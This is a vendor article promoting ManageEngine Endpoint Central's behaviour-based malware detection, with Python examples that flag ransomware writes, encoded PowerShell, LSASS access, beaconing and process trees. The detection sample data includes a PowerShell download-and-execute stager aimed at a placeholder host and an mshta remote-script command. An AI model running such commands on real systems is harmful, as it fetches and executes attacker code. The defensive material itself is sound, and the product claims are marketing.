In 2023, security analysts at ReliaQuest published a finding that stunned even veteran defenders: 86.2% of critical customer incidents that year involved fileless malware. Not exotic zero-days, not sophisticated nation-state implants. Fileless malware, code that runs entirely in memory, abuses legitimate Windows tools and leaves almost nothing on disk for a traditional antivirus scanner to find.
The tools being abused were not obscure. They were PowerShell, WMI, and system memory, together with the living-off-the-land (LotL) binaries: utilities that ship with every copy of Windows and are essential for normal system operations. The most commonly exploited LotL binaries, such as rundll32 and msiexec, were involved in 92% of all fileless detections.
According to a recent report, fileless malware attacks have surged by 78% since 2024. Available data highlights a key challenge: much of today’s malware activity leaves no traditional file artefacts for scanners to inspect.

How signature-based detection works and why it breaks
Traditional antivirus software operates on a conceptually simple principle. Security researchers capture samples of known malware, extract unique signatures and distribute those patterns as definition files. The antivirus engine then scans every file on the endpoint, comparing it byte-by-byte against its signature database. A match triggers a detection. No match, no alert.
This approach worked tolerably well for decades because malware was fundamentally a file. It landed on disk as an executable, a DLL, or a script, and it had a consistent binary structure.
Because early malware variants changed slowly, a single signature could catch thousands of infections. Shifts in the threat landscape have steadily eroded that model.
Polymorphic & metamorphic malware
Modern malware routinely mutates its own code with every infection, changing its binary structure just enough to evade signature-based detection. A single byte change throws off the signature match, rendering the scan useless.
Fileless execution
Fileless malware never touches the disk in the traditional sense. It executes in memory via PowerShell scripts, WMI commands, or injected DLLs. Since there is no persistent file to scan, signature-based detection has nothing to analyze. These attacks manipulate the command lines of trusted applications, allowing malicious activity to blend in with authorized operations.
Speed of new variants
The volume of novel malware samples now exceeds the capacity of any human-driven signature-creation pipeline. Because they rely on signature-based detection, traditional antivirus solutions detect malware only after the first infection and require constant, day-to-day definition updates. By the time a signature is written, tested, and deployed, the variant has often already mutated into something new.
The behavioural shift
Behaviour-based detection works because attackers can change code quickly, but the actions malware must perform remain tied to its intent. Ransomware always needs to enumerate files, encrypt them, and write the encrypted versions back. Trojans always need to establish outbound connections. Keyloggers must intercept input events. Data exfiltration always involves abnormal upload volumes to unfamiliar destinations.

By monitoring what a program actually does at runtime (system calls, file operations, network connections, registry modifications) a behavioural detection engine can identify malicious intent without ever examining a single byte of the program’s code.
This is the core architecture behind ManageEngine Endpoint Central’s next-generation antivirus (NGAV) engine, which powers its endpoint security. Rather than relying on a single detection method, the solution deploys a multi-layered detection strategy that combines machine learning, behaviour analysis, and deep learning with other distinct threat detection capabilities. Each layer targets a different stage of the attack lifecycle, creating a system where evading one layer still leaves the attacker exposed to the next.
AI-assisted behavioural detection: Distinguishing the ordinary from the suspicious
At the core of Endpoint Central is its AI-assisted behavioural detection engine. It monitors API calls, process injections, and lateral movement across every running process on the endpoint.
The system first establishes a baseline of normal activity, how legitimate applications behave and interact with the operating system. Once that baseline is set, it detects deviations such as unusual API calls, code injection attempts, or unexpected lateral movements.
It flags anomalies like suspicious process execution, unexpected file modifications, and abnormal access patterns. These early warning signals are structurally beyond the reach of signature-based tools.
Fileless malware detection: Seeing what never touches the disk
Fileless malware dominates modern attacks because it avoids writing files to disk. PowerShell abuse, WMI execution, and in-memory payloads leave nothing for traditional scanners to detect.
Endpoint Central includes dedicated controls designed to detect fileless activity. It monitors memory processes, identifies DLL injections, and intercepts malicious use of living-off-the-land (LotL) binaries.
For instance, an attacker may execute a payload entirely in memory via an exploit, inject a malicious DLL into a legitimate process like svchost.exe, exfiltrate data, and remove the payload without ever writing it to disk, leaving signature-based scanners with nothing to detect. Endpoint Central detects such activity by inspecting memory directly, uncovering injected code, shellcode execution, and suspicious DLL loading.
Ransomware blocking: Intent over identity
Ransomware changes its binary form constantly, but its behaviour remains consistent. Every strain must access, encrypt, and modify files at scale.
Endpoint Central detects patterns and isolates affected endpoints to prevent spread. Its behaviour analytics engine is designed to detect ransomware activity early by identifying abnormal encryption patterns. Behaviour-based detection resists evasion more effectively than signature matching.
If encryption occurs, the system rolls back changes using secure, tamper-proof backups. It operates in two modes: investigative audit mode for logging and evaluation, and active kill mode for automatic termination, quarantine, and recovery.
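The behaviour-first idea from the sections above (judge a program by what it does, not by what its bytes look like) is easiest to see on ransomware, whose file activity has a distinctive shape regardless of the binary. The following Python is an added example written for this article; it is not Endpoint Central's code and does not describe its internals. It replays constructed file-write telemetry (invented PIDs, paths and content) through a monitor that counts writes which are both high-entropy and renamed to a new extension, and it mirrors the two modes described above: an audit mode that only records, and a kill mode that marks the process for termination and lists the files to restore from backup. The thresholds are assumptions chosen for the sample data.

```python
import math
import os
import random
from collections import defaultdict

# Constructed telemetry: (timestamp_s, pid, original_path, renamed_path_or_None, bytes_written).
# Seeded pseudo-random bytes stand in for encrypted content so the run is deterministic.
_rng = random.Random(42)
RANDOM_CIPHERTEXT = bytes(_rng.getrandbits(8) for _ in range(4096))
PLAINTEXT = b"Quarterly report: revenue grew four percent over the prior period. " * 60

SAMPLE_EVENTS = (
    # pid 1001 (a text editor) saves documents in place: low entropy, no rename
    [(1.0 + i, 1001, f"C:\\Users\\bob\\Documents\\notes{i}.txt", None, PLAINTEXT) for i in range(6)]
    # pid 4242 (an unknown process) rewrites documents with high-entropy content and a new extension
    + [(2.0 + 0.2 * i, 4242, f"C:\\Users\\bob\\Documents\\doc{i}.docx",
        f"C:\\Users\\bob\\Documents\\doc{i}.docx.locked", RANDOM_CIPHERTEXT) for i in range(6)]
)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte. Text and office formats sit well below 7; ciphertext approaches 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


class RansomwareMonitor:
    """Per-process sliding window over writes that are both high-entropy and renamed to a new
    extension. 'audit' mode only records the detection; 'kill' mode marks the process for
    termination and returns the files that should be restored from backup."""

    def __init__(self, mode="audit", window_s=10.0, threshold=5, entropy_floor=7.0):
        if mode not in ("audit", "kill"):
            raise ValueError("mode must be 'audit' or 'kill'")
        self.mode = mode
        self.window_s = window_s
        self.threshold = threshold
        self.entropy_floor = entropy_floor
        self.window = defaultdict(list)      # pid -> [(ts, suspicious_flag)]
        self.touched = defaultdict(list)     # pid -> renamed output paths
        self.terminated = set()

    def observe(self, ts, pid, path, new_path, data):
        """Feed one write event; returns a response tuple when the threshold is crossed, else None."""
        if pid in self.terminated:
            return None                      # a killed process produces no further writes
        ext_changed = new_path is not None and os.path.splitext(new_path)[1] != os.path.splitext(path)[1]
        suspicious = ext_changed and shannon_entropy(data) >= self.entropy_floor
        if suspicious:
            self.touched[pid].append(new_path)
        # keep only events inside the window, then add the current one
        self.window[pid] = [(t, s) for t, s in self.window[pid] if ts - t <= self.window_s]
        self.window[pid].append((ts, suspicious))
        hits = sum(1 for _, s in self.window[pid] if s)
        if hits < self.threshold:
            return None
        if self.mode == "kill":
            self.terminated.add(pid)
            return ("terminate", pid, hits, list(self.touched[pid]))
        return ("log", pid, hits, [])


def run_scenario(mode):
    """Replay the constructed events in time order and collect the monitor's responses."""
    monitor = RansomwareMonitor(mode=mode)
    responses = []
    for event in sorted(SAMPLE_EVENTS, key=lambda e: e[0]):
        response = monitor.observe(*event)
        if response:
            responses.append(response)
    return responses


if __name__ == "__main__":
    for mode in ("audit", "kill"):
        print(mode, run_scenario(mode))
```

Note that the editor's six low-entropy saves never trip the rule, while the renaming process is caught on its fifth write; in kill mode nothing after that point is counted, and the returned path list is what a rollback step would feed to the backup restore.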
Memory exploit prevention: Guarding the runtime
Some attacks exploit system memory directly through buffer overflows, ROP chains, and stack manipulation. Endpoint Central provides runtime memory protection that detects injection attempts and blocks memory corruption.
It also delivers zero-day exploit shielding by monitoring kernel-level activity and stopping unknown exploits before patches are available. For IT teams that cannot patch instantly, this provides critical protection time.
Deep memory scanning for stealth threats: On-demand forensic layer
Advanced malware hides within trusted processes like explorer.exe to avoid detection. Endpoint Central offers on-demand full memory scanning to uncover hidden shellcode and payloads by inspecting the live runtime state of memory.
Unlike traditional antivirus that scans files after they are written, Endpoint Central scans files at the moment of creation, eliminating the gap that fast-moving malware exploits.
Credential hardening & LSASS protection
Every Windows endpoint runs a process called the Local Security Authority Subsystem Service (lsass.exe), which manages authentication and access tokens. Tools like Mimikatz can extract credential hashes directly from LSASS memory, enabling attackers to move laterally without cracking passwords.
Endpoint Central prevents LSASS memory dumping and detects suspicious credential access attempts. In enterprise environments, this blocks one of the most exploited attack paths.
Living-Off-The-Land attack prevention
In living-off-the-land attacks, adversaries abuse legitimate Windows tools such as PowerShell, WMI, RDP, rundll32, msiexec, and mshta. These tools are built into the system, so the attack requires no malicious files.
Endpoint Central detects encoded PowerShell commands, abnormal script execution, and suspicious lateral movement through RDP or WMI. It distinguishes between legitimate administrative activity and malicious behaviour through contextual analysis.
This closes a critical gap where signature-based antivirus cannot operate because the binaries involved are legitimate and signed.
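The contextual checks described above (who launched the tool, what was on its command line, and who is touching LSASS) can be expressed as rules over process telemetry. The Python below is an added example for this article, not Endpoint Central's code; it runs over constructed Sysmon-style process-creation and process-access records with invented paths and PIDs. Three rules are shown: a LotL binary started by an Office application, an encoded PowerShell command (decoded from its UTF-16LE base64 form and checked for download-and-evaluate keywords), and a non-allowlisted process opening lsass.exe with the PROCESS_VM_READ right. The LOLBin set, the Office parent set and the LSASS allowlist are assumptions to be tuned per environment.

```python
import base64
import re
from pathlib import PureWindowsPath

# Binaries the article names as living-off-the-land targets, plus their usual Office parents.
LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "rundll32.exe", "msiexec.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Assumed allowlist of system processes expected to open LSASS; tune this per environment.
LSASS_ALLOWED_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "svchost.exe", "msmpeng.exe"}
PROCESS_VM_READ = 0x0010          # access right needed to read another process's memory
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
SUSPICIOUS_SCRIPT = re.compile(
    r"\b(invoke-expression|iex|downloadstring|downloadfile|frombase64string)\b", re.IGNORECASE)


def ps_encode(script: str) -> str:
    """Base64 over UTF-16LE, the form PowerShell expects; used only to build the sample event."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script when the command line carries an encoded command, else None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def check_process_create(ev):
    reasons = []
    image, parent = basename(ev["image"]), basename(ev["parent"])
    if image in LOLBINS and parent in OFFICE_APPS:
        reasons.append(f"{image} spawned by office application {parent}")
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        if SUSPICIOUS_SCRIPT.search(decoded):
            reasons.append("decoded script contains download/eval primitives")
    if image in {"mshta.exe", "rundll32.exe"} and re.search(r"https?://", ev["cmdline"], re.I):
        reasons.append(f"{image} given a remote URL")
    return reasons


def check_process_access(ev):
    reasons = []
    if basename(ev["target"]) == "lsass.exe":
        granted = int(ev["granted"], 16)
        source = basename(ev["source"])
        if granted & PROCESS_VM_READ and source not in LSASS_ALLOWED_SOURCES:
            reasons.append(f"{source} opened lsass.exe with VM_READ (0x{granted:x})")
    return reasons


def analyze(events):
    """Return [(event_index, reasons)] for every event that trips at least one rule."""
    findings = []
    for i, ev in enumerate(events):
        checker = check_process_create if ev["type"] == "ProcessCreate" else check_process_access
        reasons = checker(ev)
        if reasons:
            findings.append((i, reasons))
    return findings


# Constructed events. The decoded script is a generic download-and-evaluate one-liner pointing
# at the reserved .invalid domain, chosen because it is what the keyword rule is meant to catch.
STAGER = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/')"
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + ps_encode(STAGER)},
    {"type": "ProcessCreate", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"type": "ProcessCreate", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/update.hta"},
    {"type": "ProcessAccess", "source": r"C:\Users\bob\Downloads\tool.exe",
     "target": r"C:\Windows\System32\lsass.exe", "granted": "0x1010"},
    {"type": "ProcessAccess", "source": r"C:\Windows\System32\csrss.exe",
     "target": r"C:\Windows\System32\lsass.exe", "granted": "0x1400"},
]

if __name__ == "__main__":
    for index, reasons in analyze(SAMPLE_EVENTS):
        print(index, "; ".join(reasons))
```

The second event, an administrator's inventory script launched from the desktop shell, produces no finding even though it uses PowerShell; the context (parent process, absence of encoding) is what separates it from the first. In practice the allowlists are the part that needs the most local tuning, since backup agents and EDR sensors legitimately read LSASS memory.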
Intent-based detection (Indicators of attack)
Most tools rely on indicators of compromise such as file hashes or malicious IP addresses, which confirm attacks after damage occurs.
Endpoint Central shifts to intent-based detection using indicators of attack. It identifies malicious methodologies in real time, maps the attack chain from breach to exfiltration, and intervenes early.
This integrates with Root Cause Analysis, full process tree reconstruction, MITRE ATT&CK TTP mapping, and IoC fingerprinting for correlation with threat intelligence feeds.

Command & control (C2) detection: Cutting the puppet strings
Persistent malware depends on communication with attacker-controlled servers for instructions and data exfiltration.
Endpoint Central detects beaconing patterns, domain generation algorithms, and suspicious encrypted channels that indicate command-and-control traffic. By blocking this communication, it neutralizes dormant threats, including advanced persistent threats, even if the initial breach went unnoticed.
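Two of the signals named above, beaconing cadence and algorithmically generated domains, can be measured directly from connection records. The Python below is an added example for this article, not Endpoint Central's code; it uses constructed outbound-connection records (invented PIDs and hosts, with the reserved .invalid domain for the suspicious one). Beaconing is scored as the coefficient of variation of the gaps between connections to the same destination, which sits near zero for a timer-driven implant and well above it for human-driven traffic; the DGA check is a crude heuristic on the leftmost label (length, character entropy, vowel ratio). The thresholds are assumptions; encrypted-channel inspection is not covered.

```python
import math
import statistics
from collections import Counter, defaultdict

# Constructed outbound-connection records: (timestamp_s, pid, destination_host).
BEACON_HOST = "xk9qz2pw7vlm4rtb.example.invalid"
SAMPLE_CONNECTIONS = (
    # pid 3100: near-clockwork 60 s cadence with a little jitter
    [(t, 3100, BEACON_HOST) for t in (0, 61, 119, 181, 240, 299, 361, 420, 479, 541)]
    # pid 2200: a browser reaching an update server on a human schedule
    + [(t, 2200, "updates.example.com") for t in (0, 5, 9, 40, 41, 120, 130, 400)]
)


def interval_cv(timestamps, min_connections=8):
    """Coefficient of variation of inter-connection gaps; near 0 means a fixed timer."""
    if len(timestamps) < min_connections:
        return None
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.fmean(gaps)
    return None if mean == 0 else statistics.pstdev(gaps) / mean


def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character of one DNS label."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def looks_generated(host: str, min_len=12, entropy_floor=3.5, vowel_ceiling=0.3) -> bool:
    """Crude DGA heuristic on the leftmost label: long, high-entropy, vowel-starved names."""
    label = host.split(".")[0].lower()
    if len(label) < min_len:
        return False
    vowel_ratio = sum(ch in "aeiou" for ch in label) / len(label)
    return label_entropy(label) >= entropy_floor and vowel_ratio <= vowel_ceiling


def find_beacons(records, cv_threshold=0.15):
    """Group connections by (pid, host) and report the regular ones with a DGA verdict."""
    by_flow = defaultdict(list)
    for ts, pid, host in records:
        by_flow[(pid, host)].append(ts)
    findings = []
    for (pid, host), stamps in by_flow.items():
        cv = interval_cv(stamps)
        if cv is not None and cv < cv_threshold:
            findings.append({"pid": pid, "host": host, "cv": round(cv, 3),
                             "dga_like": looks_generated(host), "connections": len(stamps)})
    return findings


if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_CONNECTIONS):
        print(finding)
```

The browser flow has a coefficient of variation above 1 and is ignored, while the timed flow scores well under 0.1 and its hostname trips the DGA heuristic; a real engine would add a minimum observation window and an allowlist of legitimately periodic traffic (update checks, telemetry agents) before blocking anything.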
What happens after detection: Forensics and recovery
Detection alone is not sufficient. Security teams need context to understand how the attack unfolded and where it began. Endpoint Central resolves this by integrating comprehensive forensic and remediation capabilities into every incident.
When a threat is detected, whether by the behavioural engine, the ransomware blocker, or the C2 detector, the system generates a complete incident profile:
- Root Cause Analysis (RCA): process trees and timeline reconstruction that visualize the full attack path, from initial access through propagation to impact.
- MITRE ATT&CK mapping: classifies the threat by tactics, techniques, and procedures, enabling proactive countermeasure deployment.
- Indicators of Compromise (IoC) analysis: file hashes, registry keys, and filenames tied to the attack, available for cross-referencing with VirusTotal and external threat intelligence feeds.
- Malware threat intelligence: detailed detection profiles including publisher verification status, timestamps, and infected device IDs for precise incident tracking.
For remediation, Endpoint Central quarantines and disinfects malware without human intervention, restoring modified files and registries to their original, clean state. Infected devices can be isolated from the network with a single click to stop lateral movement, while remaining accessible for remote investigation. Encrypted files are restored from secure, tamper-proof incremental backups and volume shadow copies, reverting systems to their pre-infection state within minutes.
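Process-tree and timeline reconstruction, the first item in the incident profile above, needs only process-creation records with parent IDs. The Python below is an added example for this article, not Endpoint Central's code; it indexes constructed process-creation events (invented PIDs, paths and timings), walks from an alerted process up to its earliest recorded ancestor to give the attack path, orders that chain into a timeline, and renders the whole tree so a benign sibling branch is visible next to the suspicious one.

```python
from collections import defaultdict
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record, the minimum a process tree needs."""
    ts: float
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation events; PIDs, paths and timings are invented for the example.
SAMPLE_EVENTS = [
    ProcEvent(0.0, 50, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1.0, 100, 50, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "OUTLOOK.EXE"),
    ProcEvent(2.0, 60, 50, r"C:\Windows\System32\notepad.exe", "notepad.exe todo.txt"),
    ProcEvent(30.0, 200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              "WINWORD.EXE /n invoice.docm"),
    ProcEvent(31.5, 300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -EncodedCommand <constructed>"),
    ProcEvent(33.0, 400, 300, r"C:\Windows\System32\rundll32.exe", "rundll32.exe <constructed>"),
]


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def index_events(events):
    """Map pid -> event and ppid -> [child events] so the tree can be walked in either direction."""
    by_pid = {e.pid: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e.ppid].append(e)
    return by_pid, children


def ancestry(events, alerted_pid):
    """Events from the earliest recorded ancestor down to the alerted process."""
    by_pid, _ = index_events(events)
    chain = []
    pid = alerted_pid
    while pid in by_pid:                 # stops when the parent was never recorded (e.g. pid 1)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    chain.reverse()
    return chain


def attack_path(events, alerted_pid):
    """Image names along the chain; the first entry is the root cause candidate."""
    return [basename(e.image) for e in ancestry(events, alerted_pid)]


def timeline(events, alerted_pid):
    """(timestamp, image, command line) for the chain, in start order."""
    return [(e.ts, basename(e.image), e.cmdline) for e in sorted(ancestry(events, alerted_pid), key=lambda e: e.ts)]


def render_tree(events, root_ppid=1):
    """Indented text view of the whole tree, children listed in start order."""
    _, children = index_events(events)
    lines = []

    def walk(ppid, depth):
        for e in sorted(children[ppid], key=lambda e: e.ts):
            lines.append("  " * depth + f"{basename(e.image)} (pid {e.pid}, t={e.ts})")
            walk(e.pid, depth + 1)

    walk(root_ppid, 0)
    return lines


if __name__ == "__main__":
    print(" -> ".join(attack_path(SAMPLE_EVENTS, 400)))
    print("\n".join(render_tree(SAMPLE_EVENTS)))
```

On the sample data the alert on rundll32.exe resolves to a chain that starts at the mail client and passes through a document and an encoded PowerShell launch, which is the kind of path an analyst needs in order to locate the initial access rather than just the last stage.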
The bottom line
Signature-based antivirus was built for a world where malware was a file, variants changed slowly, and endpoints stayed on the corporate network. That world no longer exists. Fileless attacks now account for the majority of critical security incidents. And endpoints roam far beyond the corporate firewall, often disconnected from cloud security infrastructure entirely.
The detection paradigm that addresses this reality is behavioural, built on machine learning, deep learning, and anomaly detection.
ManageEngine Endpoint Central’s intent-based malware detection, deep learning, and continuous behaviour monitoring provide this capability within a unified platform.
In a world where the majority of serious incidents involve malware with no file to scan, the choice of detection approach determines whether a security team is detecting threats in real time or discovering them in a ransom note.